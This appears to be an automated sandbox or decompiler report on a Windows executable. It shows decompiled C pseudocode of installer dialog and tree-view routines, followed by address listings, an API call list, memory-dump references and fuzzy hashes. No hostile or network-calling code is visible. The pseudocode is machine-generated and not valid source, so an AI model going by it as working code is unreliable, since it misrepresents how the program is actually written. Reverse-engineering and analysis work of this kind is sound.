                                                                                                                                                                                                          							if(_t237 == 0xffffffff) {
                                                                                                                                                                                                          								goto L93;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                                                                                                                                                          							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                                                                                                                                                          								_t324 = 0x20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E00401299(_t324);
                                                                                                                                                                                                          							SendMessageA(_a4, 0x420, 0, _t324);
                                                                                                                                                                                                          							_a12 = _a12 | 0xffffffff;
                                                                                                                                                                                                          							_a16 = 0;
                                                                                                                                                                                                          							_a8 = 0x40f;
                                                                                                                                                                                                          							goto L56;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_v36 = 0;
                                                                                                                                                                                                          					 *0x42f4c0 = _a4;
                                                                                                                                                                                                          					_v20 = 2;
                                                                                                                                                                                                          					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
                                                                                                                                                                                                          					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
                                                                                                                                                                                                          					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
                                                                                                                                                                                                          					_v16 = _t264;
                                                                                                                                                                                                          					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
                                                                                                                                                                                                          					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                                                                                                                                                          					 *0x42a89c = _t266;
                                                                                                                                                                                                          					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                                                                                                                                                          					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
                                                                                                                                                                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                                                                                                                                                          						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					DeleteObject(_v16);
                                                                                                                                                                                                          					_t327 = 0;
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                                                                                                                                                          						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                                                                                                                                                                          							if(_t327 != 0x20) {
                                                                                                                                                                                                          								_v20 = 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t327 = _t327 + 1;
                                                                                                                                                                                                          					} while (_t327 < 0x21);
                                                                                                                                                                                                          					_t328 = _a16;
                                                                                                                                                                                                          					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                                                                                                                                                          					_push(0x15);
                                                                                                                                                                                                          					E004042D1(_a4);
                                                                                                                                                                                                          					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                                                                                                                                                          					_push(0x16);
                                                                                                                                                                                                          					E004042D1(_a4);
                                                                                                                                                                                                          					_t329 = 0;
                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                          					if( *0x42f48c <= 0) {
                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t316 = _v24 + 8;
                                                                                                                                                                                                          						_v32 = _t316;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t284 =  &(_t316[0x10]);
                                                                                                                                                                                                          							if( *_t284 != 0) {
                                                                                                                                                                                                          								_v64 = _t284;
                                                                                                                                                                                                          								_t285 =  *_t316;
                                                                                                                                                                                                          								_v88 = _v16;
                                                                                                                                                                                                          								_t308 = 0x20;
                                                                                                                                                                                                          								_v84 = 0xffff0002;
                                                                                                                                                                                                          								_v80 = 0xd;
                                                                                                                                                                                                          								_v68 = _t308;
                                                                                                                                                                                                          								_v44 = _t329;
                                                                                                                                                                                                          								_v72 = _t285 & _t308;
                                                                                                                                                                                                          								if((_t285 & 0x00000002) == 0) {
                                                                                                                                                                                                          									if((_t285 & 0x00000004) == 0) {
                                                                                                                                                                                                          										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_v80 = 0x4d;
                                                                                                                                                                                                          									_v48 = 1;
                                                                                                                                                                                                          									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                                                                                                          									_v36 = 1;
                                                                                                                                                                                                          									 *( *0x42a8b0 + _t329 * 4) = _t290;
                                                                                                                                                                                                          									_v16 =  *( *0x42a8b0 + _t329 * 4);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t329 = _t329 + 1;
                                                                                                                                                                                                          							_t316 =  &(_v32[0x418]);
                                                                                                                                                                                                          							_v32 = _t316;
                                                                                                                                                                                                          						} while (_t329 <  *0x42f48c);
                                                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                                                          							L20:
                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                          								E00404306(_v8);
                                                                                                                                                                                                          								goto L23;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								ShowWindow(_v12, 5);
                                                                                                                                                                                                          								E00404306(_v12);
                                                                                                                                                                                                          								L93:
                                                                                                                                                                                                          								return E00404338(_a8, _a12, _a16);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L19;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}


























































                                                                                                                                                                                                          0x004051ad
                                                                                                                                                                                                          0x004051b0
                                                                                                                                                                                                          0x004051b5
                                                                                                                                                                                                          0x004051bc
                                                                                                                                                                                                          0x004051bf
                                                                                                                                                                                                          0x00405261
                                                                                                                                                                                                          0x00405269
                                                                                                                                                                                                          0x00405271
                                                                                                                                                                                                          0x00405271
                                                                                                                                                                                                          0x00405277
                                                                                                                                                                                                          0x0040527f
                                                                                                                                                                                                          0x00405290
                                                                                                                                                                                                          0x00405290
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040527f
                                                                                                                                                                                                          0x004051c5
                                                                                                                                                                                                          0x004051c8
                                                                                                                                                                                                          0x004051ce
                                                                                                                                                                                                          0x004051d3
                                                                                                                                                                                                          0x004051d5
                                                                                                                                                                                                          0x004051d7
                                                                                                                                                                                                          0x004051dd
                                                                                                                                                                                                          0x004051e4
                                                                                                                                                                                                          0x004051e9
                                                                                                                                                                                                          0x004051f0
                                                                                                                                                                                                          0x004051f3
                                                                                                                                                                                                          0x004051f3
                                                                                                                                                                                                          0x004051fa
                                                                                                                                                                                                          0x00405206
                                                                                                                                                                                                          0x0040520a
                                                                                                                                                                                                          0x0040520c
                                                                                                                                                                                                          0x0040520c
                                                                                                                                                                                                          0x004051fc
                                                                                                                                                                                                          0x004051fe
                                                                                                                                                                                                          0x004051fe
                                                                                                                                                                                                          0x0040522c
                                                                                                                                                                                                          0x00405238
                                                                                                                                                                                                          0x00405247
                                                                                                                                                                                                          0x00405247
                                                                                                                                                                                                          0x00405249
                                                                                                                                                                                                          0x0040524c
                                                                                                                                                                                                          0x00405255
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040515c
                                                                                                                                                                                                          0x00405167
                                                                                                                                                                                                          0x0040516a
                                                                                                                                                                                                          0x0040516f
                                                                                                                                                                                                          0x00405171
                                                                                                                                                                                                          0x00405175
                                                                                                                                                                                                          0x00405185
                                                                                                                                                                                                          0x0040518f
                                                                                                                                                                                                          0x00405191
                                                                                                                                                                                                          0x00405194
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405177
                                                                                                                                                                                                          0x00405177
                                                                                                                                                                                                          0x0040517d
                                                                                                                                                                                                          0x0040517f
                                                                                                                                                                                                          0x0040517f
                                                                                                                                                                                                          0x00405180
                                                                                                                                                                                                          0x00405181
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405177
                                                                                                                                                                                                          0x0040515a
                                                                                                                                                                                                          0x00405135
                                                                                                                                                                                                          0x00405078
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040508e
                                                                                                                                                                                                          0x00405098
                                                                                                                                                                                                          0x0040509d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004050af
                                                                                                                                                                                                          0x004050b4
                                                                                                                                                                                                          0x004050c0
                                                                                                                                                                                                          0x004050c0
                                                                                                                                                                                                          0x004050c2
                                                                                                                                                                                                          0x004050d1
                                                                                                                                                                                                          0x004050d3
                                                                                                                                                                                                          0x004050d7
                                                                                                                                                                                                          0x004050da
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004050da
                                                                                                                                                                                                          0x00405078
                                                                                                                                                                                                          0x00404d2c
                                                                                                                                                                                                          0x00404d2f
                                                                                                                                                                                                          0x00404d32
                                                                                                                                                                                                          0x00404d42
                                                                                                                                                                                                          0x00404d55
                                                                                                                                                                                                          0x00404d60
                                                                                                                                                                                                          0x00404d66
                                                                                                                                                                                                          0x00404d74
                                                                                                                                                                                                          0x00404d87
                                                                                                                                                                                                          0x00404d8c
                                                                                                                                                                                                          0x00404d97
                                                                                                                                                                                                          0x00404da0
                                                                                                                                                                                                          0x00404db6
                                                                                                                                                                                                          0x00404dc6
                                                                                                                                                                                                          0x00404dd2
                                                                                                                                                                                                          0x00404dd2
                                                                                                                                                                                                          0x00404dd7
                                                                                                                                                                                                          0x00404ddd
                                                                                                                                                                                                          0x00404ddf
                                                                                                                                                                                                          0x00404de2
                                                                                                                                                                                                          0x00404de7
                                                                                                                                                                                                          0x00404dec
                                                                                                                                                                                                          0x00404dee
                                                                                                                                                                                                          0x00404dee
                                                                                                                                                                                                          0x00404e0e
                                                                                                                                                                                                          0x00404e0e
                                                                                                                                                                                                          0x00404e10
                                                                                                                                                                                                          0x00404e11
                                                                                                                                                                                                          0x00404e16
                                                                                                                                                                                                          0x00404e1c
                                                                                                                                                                                                          0x00404e20
                                                                                                                                                                                                          0x00404e25
                                                                                                                                                                                                          0x00404e2d
                                                                                                                                                                                                          0x00404e31
                                                                                                                                                                                                          0x00404e36
                                                                                                                                                                                                          0x00404e3b
                                                                                                                                                                                                          0x00404e43
                                                                                                                                                                                                          0x00404e46
                                                                                                                                                                                                          0x00404f15
                                                                                                                                                                                                          0x00404f28
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404e4c
                                                                                                                                                                                                          0x00404e4f
                                                                                                                                                                                                          0x00404e52

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404CED
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404CFA
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                                                                                                                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D60
                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00404D7A
                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404DB6
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404DC2
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404DD2
                                                                                                                                                                                                          • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404E02
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404E0E
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404EA8
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404ED8
                                                                                                                                                                                                            • Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404EEC
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404F1A
                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00404F28
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405033
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405098
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004050AD
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004050D1
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004050F1
                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405116
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0040518F
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405238
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405247
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004052CA
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004052D1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                                                                                                          • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                                                                                                                                          • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                                                                                                          				struct HWND__* _v32;
                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          				struct HWND__* _t49;
                                                                                                                                                                                                          				signed int _t68;
                                                                                                                                                                                                          				struct HWND__* _t74;
                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                          				struct HWND__* _t92;
                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                          				int _t104;
                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                          				signed int _t117;
                                                                                                                                                                                                          				int _t118;
                                                                                                                                                                                                          				signed int _t123;
                                                                                                                                                                                                          				struct HWND__* _t126;
                                                                                                                                                                                                          				struct HWND__* _t127;
                                                                                                                                                                                                          				int _t128;
                                                                                                                                                                                                          				long _t131;
                                                                                                                                                                                                          				int _t133;
                                                                                                                                                                                                          				int _t134;
                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t116 = _a8;
                                                                                                                                                                                                          				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                                                                                                                                                          					_t35 = _a12;
                                                                                                                                                                                                          					_t126 = _a4;
                                                                                                                                                                                                          					__eflags = _t116 - 0x110;
                                                                                                                                                                                                          					 *0x42a8a0 = _t35;
                                                                                                                                                                                                          					if(_t116 == 0x110) {
                                                                                                                                                                                                          						 *0x42f448 = _t126;
                                                                                                                                                                                                          						 *0x42a8b4 = GetDlgItem(_t126, 1);
                                                                                                                                                                                                          						_t92 = GetDlgItem(_t126, 2);
                                                                                                                                                                                                          						_push(0xffffffff);
                                                                                                                                                                                                          						_push(0x1c);
                                                                                                                                                                                                          						 *0x429880 = _t92;
                                                                                                                                                                                                          						E004042D1(_t126);
                                                                                                                                                                                                          						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
                                                                                                                                                                                                          						 *0x42ec0c = E0040140B(4);
                                                                                                                                                                                                          						_t35 = 1;
                                                                                                                                                                                                          						__eflags = 1;
                                                                                                                                                                                                          						 *0x42a8a0 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t123 =  *0x40a1f8; // 0xffffffff
                                                                                                                                                                                                          					_t134 = 0;
                                                                                                                                                                                                          					_t131 = (_t123 << 6) +  *0x42f480;
                                                                                                                                                                                                          					__eflags = _t123;
                                                                                                                                                                                                          					if(_t123 < 0) {
                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                          						E0040431D(0x40b);
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t37 =  *0x42a8a0;
                                                                                                                                                                                                          							 *0x40a1f8 =  *0x40a1f8 + _t37;
                                                                                                                                                                                                          							_t131 = _t131 + (_t37 << 6);
                                                                                                                                                                                                          							_t39 =  *0x40a1f8; // 0xffffffff
                                                                                                                                                                                                          							__eflags = _t39 -  *0x42f484;
                                                                                                                                                                                                          							if(_t39 ==  *0x42f484) {
                                                                                                                                                                                                          								E0040140B(1);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
                                                                                                                                                                                                          							if(__eflags >= 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t117 =  *(_t131 + 0x14);
                                                                                                                                                                                                          							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                                                                                                                                          							_push(0xfffffc19);
                                                                                                                                                                                                          							E004042D1(_t126);
                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                                                                                                                                          							_push(0xfffffc1b);
                                                                                                                                                                                                          							E004042D1(_t126);
                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                                                                                                                                          							_push(0xfffffc1a);
                                                                                                                                                                                                          							E004042D1(_t126);
                                                                                                                                                                                                          							_t49 = GetDlgItem(_t126, 3);
                                                                                                                                                                                                          							__eflags =  *0x42f4ec - _t134;
                                                                                                                                                                                                          							_v32 = _t49;
                                                                                                                                                                                                          							if( *0x42f4ec != _t134) {
                                                                                                                                                                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                                                                                                          								__eflags = _t117;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							ShowWindow(_t49, _t117 & 0x00000008);
                                                                                                                                                                                                          							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                                                                                                                                                          							E004042F3(_t117 & 0x00000002);
                                                                                                                                                                                                          							_t118 = _t117 & 0x00000004;
                                                                                                                                                                                                          							EnableWindow( *0x429880, _t118);
                                                                                                                                                                                                          							__eflags = _t118 - _t134;
                                                                                                                                                                                                          							if(_t118 == _t134) {
                                                                                                                                                                                                          								_push(1);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push(_t134);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                                                                                                                                                          							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                                                                                                                                                          							__eflags =  *0x42f4ec - _t134;
                                                                                                                                                                                                          							if( *0x42f4ec == _t134) {
                                                                                                                                                                                                          								_push( *0x42a8b4);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								SendMessageA(_t126, 0x401, 2, _t134);
                                                                                                                                                                                                          								_push( *0x429880);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E00404306();
                                                                                                                                                                                                          							E0040624D(0x42a8b8, E00403DDE());
                                                                                                                                                                                                          							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                                                                                                                                          							SetWindowTextA(_t126, 0x42a8b8);
                                                                                                                                                                                                          							_push(_t134);
                                                                                                                                                                                                          							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                                                                                                                                                                          							__eflags = _t68;
                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								__eflags =  *_t131 - _t134;
                                                                                                                                                                                                          								if( *_t131 == _t134) {
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags =  *(_t131 + 4) - 5;
                                                                                                                                                                                                          								if( *(_t131 + 4) != 5) {
                                                                                                                                                                                                          									DestroyWindow( *0x42ec18);
                                                                                                                                                                                                          									 *0x42a090 = _t131;
                                                                                                                                                                                                          									__eflags =  *_t131 - _t134;
                                                                                                                                                                                                          									if( *_t131 <= _t134) {
                                                                                                                                                                                                          										goto L58;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                                                                                                                                                                                                          									__eflags = _t74 - _t134;
                                                                                                                                                                                                          									 *0x42ec18 = _t74;
                                                                                                                                                                                                          									if(_t74 == _t134) {
                                                                                                                                                                                                          										goto L58;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                                                                                                                                          									_push(6);
                                                                                                                                                                                                          									E004042D1(_t74);
                                                                                                                                                                                                          									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                                                                                                                                                          									ScreenToClient(_t126, _t135 + 0x10);
                                                                                                                                                                                                          									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                                                                                                                                          									_push(_t134);
                                                                                                                                                                                                          									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                                                                                                                                                                          									__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                          										goto L61;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									ShowWindow( *0x42ec18, 8);
                                                                                                                                                                                                          									E0040431D(0x405);
                                                                                                                                                                                                          									goto L58;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags =  *0x42f4ec - _t134;
                                                                                                                                                                                                          								if( *0x42f4ec != _t134) {
                                                                                                                                                                                                          									goto L61;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags =  *0x42f4e0 - _t134;
                                                                                                                                                                                                          								if( *0x42f4e0 != _t134) {
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L61;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						DestroyWindow( *0x42ec18);
                                                                                                                                                                                                          						 *0x42f448 = _t134;
                                                                                                                                                                                                          						EndDialog(_t126,  *0x429c88);
                                                                                                                                                                                                          						goto L58;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						__eflags = _t35 - 1;
                                                                                                                                                                                                          						if(_t35 != 1) {
                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                          							__eflags =  *_t131 - _t134;
                                                                                                                                                                                                          							if( *_t131 == _t134) {
                                                                                                                                                                                                          								goto L61;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L34;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                                                                                                                                                                          						__eflags = _t87;
                                                                                                                                                                                                          						if(_t87 == 0) {
                                                                                                                                                                                                          							goto L33;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						SendMessageA( *0x42ec18, 0x40f, 0, 1);
                                                                                                                                                                                                          						__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                                                                                                                                          						return 0 | __eflags == 0x00000000;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t126 = _a4;
                                                                                                                                                                                                          					_t134 = 0;
                                                                                                                                                                                                          					if(_t116 == 0x47) {
                                                                                                                                                                                                          						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t116 == 5) {
                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                          						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t116 != 0x40d) {
                                                                                                                                                                                                          						__eflags = _t116 - 0x11;
                                                                                                                                                                                                          						if(_t116 != 0x11) {
                                                                                                                                                                                                          							__eflags = _t116 - 0x111;
                                                                                                                                                                                                          							if(_t116 != 0x111) {
                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                          								return E00404338(_t116, _a12, _a16);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t133 = _a12 & 0x0000ffff;
                                                                                                                                                                                                          							_t127 = GetDlgItem(_t126, _t133);
                                                                                                                                                                                                          							__eflags = _t127 - _t134;
                                                                                                                                                                                                          							if(_t127 == _t134) {
                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                          								__eflags = _t133 - 1;
                                                                                                                                                                                                          								if(_t133 != 1) {
                                                                                                                                                                                                          									__eflags = _t133 - 3;
                                                                                                                                                                                                          									if(_t133 != 3) {
                                                                                                                                                                                                          										_t128 = 2;
                                                                                                                                                                                                          										__eflags = _t133 - _t128;
                                                                                                                                                                                                          										if(_t133 != _t128) {
                                                                                                                                                                                                          											L25:
                                                                                                                                                                                                          											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags =  *0x42f4ec - _t134;
                                                                                                                                                                                                          										if( *0x42f4ec == _t134) {
                                                                                                                                                                                                          											_t100 = E0040140B(3);
                                                                                                                                                                                                          											__eflags = _t100;
                                                                                                                                                                                                          											if(_t100 != 0) {
                                                                                                                                                                                                          												goto L26;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											 *0x429c88 = 1;
                                                                                                                                                                                                          											L21:
                                                                                                                                                                                                          											_push(0x78);
                                                                                                                                                                                                          											L22:
                                                                                                                                                                                                          											E004042AA();
                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										E0040140B(_t128);
                                                                                                                                                                                                          										 *0x429c88 = _t128;
                                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                                                                                                                                                                                                          									if(__eflags <= 0) {
                                                                                                                                                                                                          										goto L25;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_push(0xffffffff);
                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_push(_t133);
                                                                                                                                                                                                          								goto L22;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                                                                                                                                                          							_t104 = IsWindowEnabled(_t127);
                                                                                                                                                                                                          							__eflags = _t104;
                                                                                                                                                                                                          							if(_t104 == 0) {
                                                                                                                                                                                                          								goto L61;
